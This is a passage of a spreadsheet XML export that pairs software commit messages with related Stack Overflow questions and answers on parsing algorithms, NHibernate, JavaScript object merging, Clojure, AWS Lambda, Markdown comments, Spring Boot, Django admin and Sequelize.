: Based on the leftmost nonterminal and some number of lookahead tokens, choose which production ought to be applied to get closer to the input string.
Match
: Match the leftmost guessed terminal symbol with the leftmost unconsumed symbol of input.
As an example, given this grammar:
S → E
E → T + E
E → T
T →
int
Then given the string
int + int + int
, an LL(2) parser (which uses two tokens of lookahead) would parse the string as follows:
Production       Input              Action
---------------------------------------------------------
S                int + int + int    Predict S -&gt; E
E                int + int + int    Predict E -&gt; T + E
T + E            int + int + int    Predict T -&gt; int
int + E          int + int + int    Match int
+ E              + int + int        Match +
E                int + int          Predict E -&gt; T + E
T + E            int + int          Predict T -&gt; int
int + E          int + int          Match int
+ E              + int              Match +
E                int                Predict E -&gt; T
T                int                Predict T -&gt; int
int              int                Match int
                                    Accept
Notice that in each step we look at the leftmost symbol in our production.  If it's a terminal, we match it, and if it's a nonterminal, we predict what it's going to be by choosing one of the rules.
In an LR parser, there are two actions:
Shift
: Add the next token of input to a buffer for consideration.
Reduce
: Reduce a collection of terminals and nonterminals in this buffer back to some nonterminal by reversing a production.
As an example, an LR(1) parser (with one token of lookahead) might parse that same string as follows:
Workspace        Input              Action
---------------------------------------------------------
                 int + int + int    Shift
int              + int + int        Reduce T -&gt; int
T                + int + int        Shift
T +              int + int          Shift
T + int          + int              Reduce T -&gt; int
T + T            + int              Shift
T + T +          int                Shift
T + T + int                         Reduce T -&gt; int
T + T + T                           Reduce E -&gt; T
T + T + E                           Reduce E -&gt; T + E
T + E                               Reduce E -&gt; T + E
E                                   Reduce S -&gt; E
S                                   Accept
The two parsing algorithms you mentioned (LL and LR) are known to have different characteristics.  LL parsers tend to be easier to write by hand, but they are less powerful than LR parsers and accept a much smaller set of grammars than LR parsers do.  LR parsers come in many flavors (LR(0), SLR(1), LALR(1), LR(1), IELR(1), GLR(0), etc.) and are far more powerful.  They also tend to have much more complex and are almost always generated by tools like
yacc
or
bison
.  LL parsers also come in many flavors (including LL(*), which is used by the
ANTLR
tool), though in practice LL(1) is the most-widely used.
As a shameless plug, if you'd like to learn more about LL and LR parsing, I just finished teaching a compilers course and have
some handouts and lecture slides on parsing
on the course website.  I'd be glad to elaborate on any of them if you think it would be useful.</t>
  </si>
  <si>
    <t xml:space="preserve">I have a project that is supposed to run on different (at least 2) databse backends, so users can choose (currently between MSSQL and SQLite). I've just started learning NHibernate, following the [external-link].
Now, my current Architecture looks like this:
MyProject.DAL
Contains NewsItem and INewsItemRepository. NewsItem is a POCO, essentially just an int Id and string Title.
INewsItemRepository is the Interface that includes CRUD Functionality.
MyProject.Plugins.DAL.MSSQL
This class implements the backend. It includes hibernate.cfg.xml, NewsItem.hbm.xml and NewsItemRepository.
The cfg holds the Driver and ConnectionString, the hbm is the SQL-Server specific Mapping, and NewsItemRepository implements the INewsItemRepository.
If I want to add the MyProject.Plugins.DAL.SQLite, I will have to duplicate all this, which is logical. However, I wonder if that is the correct approach? I feel like I'm unnecessarily duplicating things. I mean: I need to make sure the mapping is Database-specific, and that I update all my Plugins if the database changes. But this architecture still seems somehow... bloated.
Am I doing the right thing here? Or are there common patterns about what goes into  the general business assembly and what needs to be kept separate for each database?
Edit: One of the challenges here is the handling of sql-types. For example, strings are mapped as nvarchar(255) by default, and if I need ntext in MSSQL, i'll have to use the &lt;column sql-type="NTEXT" syntax, do I? I guess that specifying sql-type is database-dependent, so I'll need my mapping separated per database? Or is there a built-in mechanism to have mappings "inherit" each other? (I.e. have one .hbm.xml with all the &lt;property&gt; Tags in the general DAL Project and then .hbm's in each Backend-Assembly containing the columns?
</t>
  </si>
  <si>
    <t>C835</t>
  </si>
  <si>
    <t>Add Flight API prototype &amp; tests
Add new Flight API prototype to act as gateway in between the code task
application and the external API, to keep the endpoints clear of the
application, whilst also making them easier to test in isolation.
== Notes:
- Update steps undertaken document
- Add Nock Node library dependency to intercept and Mock out external
  URL requests to the Locomotive code task server
== References
- [node-nock/nock: HTTP mocking and expectations library]
  (https://github.com/node-nock/nock)
- [Mocking External HTTP Requests in Node Tests with Nock - Semaphore]
  (https://semaphoreci.com/community/tutorials/mocking-external-http-requests-in-node-tests-with-nock)
- [Reading "Module Patterns" | Leanpub]
  (https://leanpub.com/modulepatterns/read_full)
  (https://leanpub.com/modulepatterns/OEBPS/chap08.xhtml#leanpub-auto-prototype-based-class)
- [javascript - Spread operator vs Object.assign - Stack Overflow]
  (https://stackoverflow.com/questions/32925460/spread-operator-vs-object-assign)
- [How can I merge properties of two JavaScript objects dynamically? -
  Stack Overflow]
  (https://stackoverflow.com/questions/171251/how-can-i-merge-properties-of-two-javascript-objects-dynamically)
- [oop - JavaScript private methods - Stack Overflow]
  (https://stackoverflow.com/questions/55611/javascript-private-methods)
- [P of EAA: Gateway]
  (https://martinfowler.com/eaaCatalog/gateway.html)</t>
  </si>
  <si>
    <t>This isn't necessarily exhaustive.
Spread syntax
options = {...optionsDefault, ...options};
Advantages:
If authoring code for execution in environments without native support, you may be able to just compile this syntax (as opposed to using a polyfill). (With Babel, for example.)
Less verbose.
Disadvantages:
When this answer was originally written, this was a proposal, not standardized. When using proposals consider what you'd do if you write code with it now and it doesn't get standardized or changes as it moves toward standardization. This has since been standardized in ES2018.
Literal, not dynamic.
Object.assign()
options = Object.assign({}, optionsDefault, options);
Advantages:
Standardized.
Dynamic. Example:
  var sources = [{a: "A"}, {b: "B"}, {c: "C"}];
  options = Object.assign.apply(Object, [{}].concat(sources));
  // or
  options = Object.assign({}, ...sources);
Disadvantages:
More verbose.
If authoring code for execution in environments without native support you need to polyfill.
This is the commit that made me wonder.
That's not directly related to what you're asking. That code wasn't using Object.assign(), it was using user code (object-assign) that does the same thing. They appear to be compiling that code with Babel (and bundling it with Webpack), which is what I was talking about: the syntax you can just compile. They apparently preferred that to having to include object-assign as a dependency that would go into their build.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I have array of objects as sample below.
After JSONata evaluation, the order of array of object changes. string with numeric id appears before i.e id 5 appears before id 4a.&lt;/p&gt;
&lt;p&gt;How to avoid this change in order&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;var data = [
    {
        &amp;quot;id&amp;quot;: 1,
        &amp;quot;body&amp;quot;: &amp;quot;First Item&amp;quot;,
        &amp;quot;severity&amp;quot;: 1,
        &amp;quot;status&amp;quot;: 0
    },
    {
        &amp;quot;id&amp;quot;: 2,
        &amp;quot;body&amp;quot;: &amp;quot;Second Item&amp;quot;,
        &amp;quot;severity&amp;quot;: 2,
        &amp;quot;status&amp;quot;: 1
    },
{
        &amp;quot;id&amp;quot;: 3,
        &amp;quot;body&amp;quot;: &amp;quot;third Item&amp;quot;,
        &amp;quot;severity&amp;quot;: 4,
        &amp;quot;status&amp;quot;: 2
    }, 
{
        &amp;quot;id&amp;quot;: 4a,
        &amp;quot;body&amp;quot;: &amp;quot;four Item&amp;quot;,
        &amp;quot;severity&amp;quot;: 2,
        &amp;quot;status&amp;quot;: 1
    },
{
        &amp;quot;id&amp;quot;: 5,
        &amp;quot;body&amp;quot;: &amp;quot;five Item&amp;quot;,
        &amp;quot;severity&amp;quot;: 2,
        &amp;quot;status&amp;quot;: 3
    }
]
var result = JSONata(query).evaluate(data)
&lt;/code&gt;&lt;/pre&gt;
</t>
  </si>
  <si>
    <t>C836</t>
  </si>
  <si>
    <t>refactor, Port-Mortem, Clojure(Script), clods, mirabelle
dictionary - How to refactor Clojure source code, especially to rename the keywords of a map collection? - Stack Overflow https://stackoverflow.com/questions/66632450/how-to-refactor-clojure-source-code-especially-to-rename-the-keywords-of-a-map
My Clojure Port-Mortem https://gist.github.com/wildermuthn/c783ed4f6735fa66c4e7ad34830b3977
thegeez blog - Walkthrough of a spreadsheet/database-hybrid with Clojure(Script) http://thegeez.net/2021/03/15/spreadsheet_database_clojure_aws.html
clods: A microservice and toolchain for providing UK organisational data services (ODS) https://github.com/wardle/clods
mirabelle: A stream processing engine for monitoring https://github.com/mcorbin/mirabelle
(mcorbin.fr): Mirabelle, a new stream processing engine for monitoring https://mcorbin.fr/posts/2021-03-01-mirabelle-stream-processing</t>
  </si>
  <si>
    <t>It would be a challenge when you had used an unqualified
:x
for forty distinct meanings and then decide to rename one of them.  And the challenge would become a headache if you did not have (and did not want to make) test cases sufficient to detect the loss of an intended argument.
Next time, consider designating (unique) namespace-qualified keywords for uses that will be spread wide.  Replacement is unambiguous and tools are more likely to automate it.
A few language features can help while you rework your code, depending on the scale of the scope within which you decide to rename stuff.
Preconditions
give you a place to assert about a destructured argument (or merely log it, if you need to judge success case-by-case).
Pure functions
allow you to clone a bunch of your code, rename stuff (or revise any logic) in the cloned version, and then run both versions in parallel and assert they came up with the same result.  For example, clone function
f
as
f-1
and
f-2
, rework
f-2
, and reprogram
f
so it calls both
f-1
and
f-2
and asserts the results are the same.  When they agree, you can delete the original.
Tests
are super easy with the built-in
clojure.test
(and there are more elaborate alternatives).</t>
  </si>
  <si>
    <t xml:space="preserve">I guess I'm old school, when I architect a project I still think of writing a database layer that includes use of objects like datareaders and datasets... But it seems to me that Microsoft had to come up with better tools since my last project in 2.0, something that would hide all the pipping labor and keep the developer focused on writing logic, or at least less plumbing code. 
How is that done with 3.5 ?
Thanks,
Yann
</t>
  </si>
  <si>
    <t>C837</t>
  </si>
  <si>
    <t>Remove parallelism reminants and code cleanup
The parallel processing code never worked.  The remaining code was
difficult to understand.  This commit fixes both issues.  For the
record, here is the contents that described the parallel processing
code:
&gt; AWS-SQS-SES-Lambda-Thread-Polling
&gt;
&gt; This example illustrates a scenario where an AWS SQS Queue, AWS SES and a Lambda function, work together to deliver messages from SQS to SES. The code given in "sqs-microservice-python3.py" file contains the Lambda code to be run in Python3 environment.
Copyright (c) Keet Malin Sugathadasa — Used and adapted here under the Apache 2 license
[Keetmalin/AWS-SQS-SES-Lambda-Thread-Polling](https://github.com/Keetmalin/AWS-SQS-SES-Lambda-Thread-Polling)
Adaptations made by jester@dltj.org because the multiprocessing.Pool technique here didn't work on AWS Lambda. See discussion:
 * [python multiprocessing - _multiprocessing.SemLock is not implemented when running on AWS Lambda - Stack Overflow](https://stackoverflow.com/a/61099808/201674)
 * [Replace multiprocessing by thread worker (fixes #60) by leplatrem · Pull Request #103 · mozilla-services/remote-settings-lambdas](mozilla-services/remote-settings-lambdas@e124220)</t>
  </si>
  <si>
    <t>As far as I can tell, multiprocessing won't work on AWS Lambda because the execution environment/container is missing
/dev/shm
- see
https://forums.aws.amazon.com/thread.jspa?threadID=219962
(login may be required).
No word (that I can find) on if/when Amazon will change this. I also looked at other libraries e.g.
https://pythonhosted.org/joblib/parallel.html
will fallback to
/tmp
(which we know DOES exist) if it can't find
/dev/shm
,
but that doesn't actually solve the problem
.</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;I am working with &lt;strong&gt;Pandas 1.5.3&lt;/strong&gt; and using pd.concat to merge two large DataFrames that contain categorical columns. Initially, everything works fine, but after running continuously at scale, the categorical dtype is sometimes lost, and the column becomes an object dtype instead.&lt;/p&gt;
&lt;p&gt;I have the following function that ensures both DataFrames share the same categorical dtype before concatenation:&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import pandas as pd
def set_column_categories(df1: pd.DataFrame, df2: pd.DataFrame, columns: list) -&amp;gt; pd.DataFrame:
    for col in columns:
        all_categories = pd.Index(df1[col].cat.categories).union(pd.Categorical(df2[col]).categories)
        df1[col] = df1[col].astype(pd.CategoricalDtype(categories=all_categories))
        df2[col] = df2[col].astype(pd.CategoricalDtype(categories=all_categories))
    return pd.concat([df1, df2], axis=0)
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;This function is executed repeatedly in an application that processes large DataFrames. However, over time, pd.concat starts returning columns as object dtype instead of retaining them as category.&lt;/p&gt;
&lt;p&gt;**What Iâ€™ve Tried:  **&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Verified that both df1 and df2 have categorical dtypes before concatenation.&lt;/li&gt;
&lt;li&gt;Checked if converting to CategoricalDtype before concat helps, but the issue persists.&lt;/li&gt;
&lt;li&gt;It works fine on small DataFrames but fails inconsistently at scale.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;**Expected Behavior:  **&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;The categorical dtype should always be retained after concatenation.&lt;/li&gt;
&lt;/ul&gt;
&lt;p&gt;**Actual Behavior: **&lt;/p&gt;
&lt;ul&gt;
&lt;li&gt;Initially works, but for large DataFrames processed continuously, some categorical columns become object dtype after pd.concat.&lt;/li&gt;
&lt;/ul&gt;
</t>
  </si>
  <si>
    <t>C838</t>
  </si>
  <si>
    <t># ChemEventzedme- Microservice Spring Event
&amp;nbsp;
ChemEventz is a web application that tracks chemical events around the world.
ChemEventz has been designed to be a collaborative platform to facilitate meetings between researchers, professors, students or anyone interested in these events.
How to make these meetings easier?
  - ChemEventz lists recent events of the most popular events sites
  - Allows users of the platform to add the next known events
  - ChemEventz may allow you to find your future collaborator, job or internship during these meetings
ChemEventz is divided into 5 parts available in my Github account  [public repositories][Git]
  - [ChemEventz - Scraper][GitScrap]
  - [ChemEventz - NodeJS - API][GitNodeJS]
  - [ChemEventz - Spring Boot Microservice Authentication][GitSpringAuth]
  - [ChemEventz - Spring Boot Microservice Events][GitSpringEvents]
  - [ChemEventz - Angular][GitAngular]
ChemEventz uses a number of open source projects to work properly:
* [Angular] - HTML enhanced for web apps!
* [node.js] - v12 for the backend
* [Express] - fast node.js network app framework
* [Spring Boot] - focus on application-level business logic
* [MongoDB] - non-relationnal database for events storage
* [MySQL] - relational dataBase for users data storage
Technologies used to deploy ChemEvents project:
* [Heroku] - Deploy Spring and NodeJS microservices
* [AWS S3] - Deploy Angular microservice
* [AWS RDS] - Cloud MYSQL database Hosting
* [Mongo Atlas] - Cloud MongoDB database Hosting
&amp;nbsp;
______________________________________
&amp;nbsp;
* [JAVA] - version 8
* [Spring Boot] - focus on application-level business logic
* [Maven] - Manage project
ChemEventz requires Java 8 to run.
Create new folder
```sh
$ git clone https://github.com/nawelb/ChemEvents_Back_Spring_Events
$ cd ChemEvents_Back_Spring_Events
```
Import the project in your favorite IDE :
Then, add environnement variables :
 - PORT_EVENT : free port to allow this application to run
 - HOST_NAME : as url of your node API [cf node API]
```sh
$ mvn clean install package
```
Finally, run the project.
POST
- /event-api/private/event
/GET
- /event-api/public/events : get all data in the database
- /event-api/public/event/{_id} : replace “{_id}” by an event id in the db, to search an event by id
- /event-api/public/search?research=word : replace “word” by any keyword, to search an event by keyword
- /event-api/public/event?country=France : replace “France” by any country name, to search an event by country
- /event-api/public/event?city=Paris : replace “Paris” by any city name, to search an event by city
/PUT
- /event-api/private/admin/event
/DELETE
- /event-api/private/admin/event/{_id} : replace “{_id}” by an event id in the db, to delete an event by id
[//]: # (These are reference links used in the body of this note and get stripped out when the markdown processor does its job. There is no need to format nicely because it shouldn't be seen. Thanks SO - http://stackoverflow.com/questions/4823468/store-comments-in-markdown-syntax)</t>
  </si>
  <si>
    <t xml:space="preserve">I often see people saying that certain software is "very opinionated" or that Microsoft tends to write "un-opinionated" frameworks. What does this actually mean?
</t>
  </si>
  <si>
    <t>I believe that all the previously proposed solutions (apart from those that require specific implementations) result in the comments being included in the output HTML, even if they are not displayed.
If you want a comment that is strictly for yourself (readers of the converted document should not be able to see it, even with "view source") you could (ab)use the link labels (for use with reference style links) that are available in the core Markdown specification:
http://daringfireball.net/projects/markdown/syntax#link
That is:
[comment]: &lt;&gt; (This is a comment, it will not be included)
[comment]: &lt;&gt; (in  the output file unless you use it in)
[comment]: &lt;&gt; (a reference style link.)
Or you could go further:
[//]: &lt;&gt; (This is also a comment.)
To improve platform compatibility (and to save one keystroke) it is also possible to use
#
(which is a legitimate hyperlink target) instead of
&lt;&gt;
:
[//]: # (This may be the most platform independent comment)
For maximum portability it is important to insert a blank line before and after this type of comments, because some Markdown parsers do not work correctly when definitions brush up against regular text. The most recent research with Babelmark shows that blank lines before and after are both important. Some parsers will output the comment if there is no blank line before, and some parsers will exclude the following line if there is no blank line after.
In general, this approach should work with most Markdown parsers, since it's part of the core specification. (even if the behavior when multiple links are defined, or when a link is defined but never used, is not strictly specified).</t>
  </si>
  <si>
    <t>C839</t>
  </si>
  <si>
    <t>Upgrade to Spring Boot 3.1 and Spring Cloud 2022 (#150)
* Major upgrade
  * to Spring Boot 3.1
  * upgrade all dependencies and plugins to latest available
  * fix test configuration properties
  * fix references to test-resources
  * json schema validator changed groupId
  * auth0 provider changed to okta-spring-boot-starter
  * security configuration implementation changes - remain untested, just enough to compile
* Round 2 of updates
* still finding a path thru the woods
* Had to adjust Spring Boot Maven Plugin configuration for deployables
  * @see https://docs.spring.io/spring-boot/docs/current/maven-plugin/reference/htmlsingle/#packaging.examples.local-artifact
  * Had to adjust Spring Cloud Streams b/c there's quite a bit of change from 2.x to 3.x
    * @see https://dev.to/habutre/migrating-spring-cloud-stream-v2-to-v3-5dip
* Fix broken validation assertion logi in Ingest service stub
* Adjusted test configuration for Ingest; added disable flags and exclude autoconfigs
* More updates
  * Replace mysql-connector-java with more recent db driver myql-connector-j
  * Whitespace removal
  * Don't override Spring Boot 3.1.x parent's management of Flyway dependency version
  * Remove traces of javax.* and jsr305 dependencies and properties
* Temporarily disable Sproc testing
* due to open issue flyway/flyway#3782
* also temporarily add H2 console support to test in @BeforeAll annotated method
  * need to figure out why stored entity attribute values are getting truncated; either on persistence or retrieval
* First full successful build
  * but we're not done yet
  * had to plumb some new Flyway placeholders to support quirkiness of H2 and Java 17 wrt nanosecond precision of TIMESTAMP
  * had to update the casted type to return not just the first character but the full value persisted from tables participating in all_entity_values view
  * improve logging levels for troubleshooting in test-resources/application.yml
  * override and upgrade H2 to 2.2.224
  * add columnDefinition attribute to all @Column-annotated filed with type LocalDateTime
  * Fix some test logic in test cases within JdbcEntityRepositoryTest
  * Adjust mapRows method logic in JdbcEntityRepository so we're not casting, but taking advantage of new method signatures in SqlRowSet
* Upgrade all  Java 8 Dockerfile images
  * to Java 21
* Resurrect and refactor shared-config/application.yml
  * we'll likely have to tune this file when we really start integration testing
* Swap API Gateway: Phase out Zuul, bring in Spring Cloud Gateway
  * taking inspiration from https://spring.io/guides/gs/gateway/
* Doc update: DEV_NOTES.md
  * reflect the switch from Zuul to Spring Cloud Gateway
* Updates to Dockerfile and Docker Compose infra and setup
  * mainly upgrading to latest available images
  * needs testing!
* Roadmap updates
* Fix shell warning
* Resurrect Spring Boot Admin for application observability
  * update Docker Compose setup
  * add child module to support POM
* Fix Maven plugin Docker builds for deployables and support infra
  * and fix ref to .jar file in manifest.yml
* Update scripts to invoke docker compose as plugin
* Miscellaneous fixes
* Remove milestone and snapshot dependency and plugin repositories resolution for Spring managed artifacts
* Fallback to Micrometer 1.11.5
* Update Git Commit Plugin config
  * we now see the abbreviated form of commit id in banner text
* Rename observability module and remove shared-config/application.yml
  * because it will be sourced from a Git repo along with individual configuration for each Spring Boot microservice via a Spring Cloud Config Server instance
  * adjust Docker Compose configuration
* Addressing breaking changes wrt bootstrap config
  * @see https://github.com/spring-cloud/spring-cloud-release/wiki/Spring-Cloud-2022.0-Release-Notes#breaking-changes
  * @see https://stackoverflow.com/questions/64994034/bootstrap-yml-configuration-not-processed-anymore-with-spring-cloud-2020-0</t>
  </si>
  <si>
    <t>As pointed put by Nicoll, With Spring Cloud Vault 3.0 and Spring Boot 2.4, the bootstrap context initialization (
bootstrap.yml
,
bootstrap.properties
) of property sources was
deprecated
. This can be fixed in one of the 2 ways
Use Spring Boot 2.4.0 Config Data API to import configuration from Vault (Preferred)
Legacy Processing: Enable the bootstrap context either by setting the configuration property
spring.cloud.bootstrap.enabled=true
or by including the dependency
&lt;dependency&gt;
    &lt;groupId&gt;org.springframework.cloud&lt;/groupId&gt;
    &lt;artifactId&gt;spring-cloud-starter-bootstrap&lt;/artifactId&gt;
&lt;/dependency&gt;
1. Use Spring Boot 2.4.0 Config Data API  (Preferred)
Move
bootstrap.yml
configuration to
application.yml
and updated file looks like below
application.yml
spring:
  cloud:
    vault:
      authentication: APPROLE
      app-role:
        role-id: ${role-id}
        secret-id: ${secret-id}
        role: pres-read
        app-role-path: approle
      uri: ${vault-server}
      connection-timeout: 5000
      read-timeout: 15000
  config:
    import: vault://secret/app/pres/
And define individual profiles as shown below. Add
spring.config.import: vault://secret/app/pres/demo
property.
application-demo.yml
## Server Properties
server:
  port: 8081
spring:
  config:
    import: vault://secret/app/pres/demo
  datasource:
    username: ${pres.db.username}
    password: ${pres.db.password}
    url: ${pres.db.url}
    driver-class-name: com.mysql.cj.jdbc.Driver
Repeat the same process for all profiles like dev, test, qc, staging and prod.
2. Legacy Processing:
Add the following dependency if you still want to use
bootstrap.yml
&lt;dependency&gt;
    &lt;groupId&gt;org.springframework.cloud&lt;/groupId&gt;
    &lt;artifactId&gt;spring-cloud-starter-bootstrap&lt;/artifactId&gt;
&lt;/dependency&gt;
to the project. The issue will be resolved.
See
Spring Cloud Vault docs
for more information</t>
  </si>
  <si>
    <t xml:space="preserve">&lt;p&gt;im getting this error in browser console &lt;a href="https://i.sstatic.net/nutBD25P.jpg" rel="nofollow noreferrer"&gt;browser console error display&lt;/a&gt;&lt;/p&gt;
&lt;p&gt;Error: &lt;img src="https://i.sstatic.net/nutBD25P.jpg" alt="" /&gt;&lt;/p&gt;
&lt;p&gt;here my handleclick code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;const handleClick=async(e:any )=&amp;gt;{
        e.preventDefault();
        if(isSignupFlow){
               try{
                const response: AxiosResponse= await axios.post(&amp;quot;http://localhost:2828/api/auth/createuser&amp;quot;, {
                  email,
                  password,
                })
                    console.log(response.status);
                    console.log(response.data.json);    
                  } catch(error)
                   {
                    if (axios.isAxiosError(error)) {
                        console.log(error.status)
                        console.error(error.response);
                        setErrorMsg(error.message); 
                      } else {
                        console.error(error);
                      }
                  }
        }else{
            try{
                const response: AxiosResponse= await axios.post(&amp;quot;http://localhost:2828/api/auth/login&amp;quot;, {
                  email,
                  password,
                })
                    console.log(response.status);
                    console.log(response.data.authtoken);
                    setState({
                      data:{
                        id: response.data.user.id,
                        email:response.data.user.email,
                      },
                      loading:false,
                      error:null,
                    });
                    localStorage.setItem(&amp;quot;token&amp;quot;,response.data.token);
                    axios.defaults.headers.common[&amp;quot;Authorization&amp;quot;] = `Bearer ${response.data.token}`;
                    navigate(&amp;quot;/articles&amp;quot;);
                  } catch(error)
                   {
                    if (axios.isAxiosError(error)) {
                        console.log(error.status)
                        console.error(error.response);
                        setErrorMsg(error.message); 
                      } else {
                        console.error(error);
                      }
                  }
        }
    };
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;here is context api code&lt;/p&gt;
&lt;pre&gt;&lt;code&gt;import {createContext, useEffect, useState} from &amp;quot;react&amp;quot;;
import axios from &amp;quot;axios&amp;quot;;
export interface User{
    data:{
        id: String;
        email:string
    } | null;
    error: string | null
    loading:boolean 
}
const UserContext=createContext&amp;lt;
[User, React.Dispatch&amp;lt;React.SetStateAction&amp;lt;User&amp;gt;&amp;gt;]
&amp;gt;([
    {data:null,
    loading:true,
    error:null},
    () =&amp;gt; {}
])
const UserProvider = ({children}:any) =&amp;gt;{
    const [user,setUser] = useState&amp;lt;User&amp;gt;({
        data:null,
    loading:true,
    error:null,
    });
    const token=localStorage.getItem(&amp;quot;token&amp;quot;);
    if(token){
      axios.defaults.headers.common[&amp;quot;Authorization&amp;quot;]=`Bearer ${token}`;
    }
    const fetchUser = async () =&amp;gt;{
         const {data: response} =await axios.get(&amp;quot;http://localhost:2828/api/auth/me&amp;quot;);
       axios.get(&amp;quot;http://localhost:2828/api/auth/me&amp;quot;);
        if(response.data &amp;amp;&amp;amp; response.data.user){
            setUser({
                data:{
                    id: response.data.user.id,
                    email: response.data.user.email
                },
                loading:false,
                error:null
            })
        }else if(response.data &amp;amp;&amp;amp; response.data.errors.length){
            setUser({
                data:null,
                loading:false,
                error:response.error[0].msg,
            })
        }
    }
    useEffect(() =&amp;gt;{
        if(token){
            fetchUser();
        }else{
            setUser({
                data: null,
                loading:false,
                error:null,
            })
        }
    },[]);
    return &amp;lt;UserContext.Provider value={[user, setUser]}&amp;gt;
    {children}
&amp;lt;/UserContext.Provider&amp;gt;
};
export {UserContext, UserProvider}
&lt;/code&gt;&lt;/pre&gt;
&lt;p&gt;please help me this typeerror as showing in the browser console as&lt;/p&gt;
&lt;p&gt;TypeError: Cannot read properties of undefined (reading 'id')&lt;/p&gt;
&lt;p&gt;i am using react typescript frontend.&lt;/p&gt;
&lt;p&gt;TypeError: Cannot read properties of undefined (reading 'id')&lt;/p&gt;
&lt;p&gt;id: response.data.user.id,&lt;/p&gt;
&lt;p&gt;here first id is string type as but the second id is any type. i tried to keep them as string type but i am failed to do so.&lt;/p&gt;
</t>
  </si>
  <si>
    <t>C84</t>
  </si>
  <si>
    <t>RegistrationFieldValue(Inline)Admin: Improve editing of values
This limits the choices for some dropdowns based on other fields, and
limits editing of some values in inlines where they choices cannot be
properly limited (and adding a change link from the inline to the
regular admin where the option field is properly limited).
Additionally, makes some fields readonly after initial creation of
a RegistrationFieldValue. For the inline, this needed to create two
separate inlines, one for viewing the values with all fields readonly,
and one for adding new values. This trick was taken from
https://stackoverflow.com/a/28149575/740048
Note that another answer to that post has a simpler answer disabling
change permission on the inline to make all fields readonly, but that
also changes the "change" links into "view" links, which is not really
intuitive, so this more complex solution is used instead.</t>
  </si>
  <si>
    <t>Having the same problem, I came across this fix:
Create two inline objects, one with no change permission, and the other with all the fields read-only. Include both in the model admin.
class SubscriptionInline(admin.TabularInline):
    model = Subscription
    extra = 0
    readonly_fields = ['subscription', 'usedPtsStr', 'isActive', 'activationDate', 'purchaseDate']
    def has_add_permission(self, request):
        return False
class AddSupscriptionInline(admin.TabularInline):
    model = Subscription
    extra = 0
    fields = ['subscription', 'usedPoints', 'isActive', 'activationDate', 'purchaseDate']
    def has_change_permission(self, request, obj=None):
        return False
    # For Django Version &gt; 2.1 there is a "view permission" that needs to be disabled too (https://docs.djangoproject.com/en/2.2/releases/2.1/#what-s-new-in-django-2-1)
    def has_view_permission(self, request, obj=None):
        return False
Include them in the same model admin:
class UserAdmin(admin.ModelAdmin):
    inlines = [ AddSupscriptionInline, SubscriptionInline]
To add a new subscription I use the AddSubscriptionInline in the admin. Once it is saved, the new subscription disappears from that inline, but now does appear in the SubscriptionInline, as read only.
For SubscriptionInline, it is important to mention extra = 0, so it won't show junk read-only subscriptions. It is better also to hide the add option for SubscriptionInline, to allow adding only via AddSubscriptionInline, by setting the has_add_permission to always return False.
Not perfect at all, but it's the best option for me, since I must provide the ability to add subscriptions on the user admin page, but after one is added, it should be changed only via the internal app logic.</t>
  </si>
  <si>
    <t xml:space="preserve">Compared to 
Simple memory access
Disk access
Memory access on another computer(on the same network)
Disk access on another computer(on the same network)
in C++ on windows.
</t>
  </si>
  <si>
    <t>C840</t>
  </si>
  <si>
    <t>Feat/site launch (#578)
* Feat/site launch db (#562)
* feat(launches table): migrations + table for launches
* feat(redirections): redirections table + migration
* fix(redirections table): remove redundant column
* fix(site launch models): add forign key references
* feat(site launch models): add default values for created at and updated at
* fix(launches): change  type to number
* fix(launches FK): typo in FK for launches table
* feat(site launch db): site associations for db
* fix(site launch models ): correct usage of model associations
* style(serverless): add .serveless files to git ignore
* feat(site model): include has one association to launch
* fix(db tests): add launches and redirections to test folder
* feat(site launch db): add assocations for user - launch &amp; launch - redir
* fix(site launch sequalize): fix typos
* Feat/site launch backend services (#558)
* feat(launches table): migrations + table for launches
* feat(redirections): redirections table + migration
* fix(launches): change  type to number
* feat(site launch db): site associations for db
* fix(site launch models ): correct usage of model associations
* feat(site launch db): add assocations for user - launch &amp; launch - redir
* fix(site launch sequalize): fix typos
* feat(site launch): add logic to parse and process site launch form
* fix(site launch): fix attribute name typo
* feat(launch client): add a launch client
* feat(launch Client): add method to send createDomainAssociation
* refactor(launch client): remove unnecessary async
* feat(launch service): add launch service
* chore(deployment client ): remove unused imports
* feat(site launch): creation of domain assocaitaion in amplify
* feat(site launch): getting dns redirections info from amplify
* fix(launches model): fix incorrect types for launches model
* fix(launches and redirections models): tables should be paranoid, and have
* fix(redirections table): fix typo in migrations during table drop
* feat(site launch): remove hardcoded params when updating db
* chore(formsg site launch): temp hardcode of variables for easier dev
* feat(site launch): pushing messages to local queue
* feat(site launch): add localstack to docker container
* feat(site launch): ability to add and read + rm messages from queues
* feat(site launch): [wip] updating db after successful launch
* feat(site launch): define shape of message
ability to write into db after successful launch
* refactor(QueueClient): remove hardcoded queue url
* feat(sitelaunch): standarise shape of message sent to outgoing queue
* fix(site launch): preventing race condition when 2 sites launched...
at the same time. Originally, LaunchesService had instance variables to
cache results from the db, rather than keep re-pining the db for the
siteId + appId. But, this might lead to a race condition if two forms
were submitted back-to-back. As such, data is passed back to the parent
to be reused, rather than storing it within the singular object
 being created during runtime.
* feat(site launch): add support for 'www' redirection domain
* feat(site launch): support for adding redirection into outgoing queue
* refactor(queue service): change code style to prevent inner functions
* fix(site launch): prevent weird  bug when polling for the
incomming queue. For more details:
aws/aws-sdk-js#2793
* feat(site launch): ability to update redirections table
* chore(site launch): remove unused imports
* fix(incoming queue poller): fix undeterministic bug with regards HTTP push
* style(redirections table): add in enums for type of redirections
* style(site launch): add in comments for clarity
-change  to
* refactor(site launch): renames for clairty
* refactor(site launch): dependency injection pattern design
* fix(redirections model): drop enum in teardown
Note: code from here: https://stackoverflow.com/questions/48730477/seque
lize-migration-queryinterface-removecolum-fails-to-work</t>
  </si>
  <si>
    <t>Sequelize creates TYPES for each of the enum you define, which you can find
here
The name of the ENUM type is the concatenation of "enum", the table name, and the column name in snake casing. (
enum_Books_Rating
here)
To create migrations for
ENUM
, you have to modify your down function like so:
module.exports = {
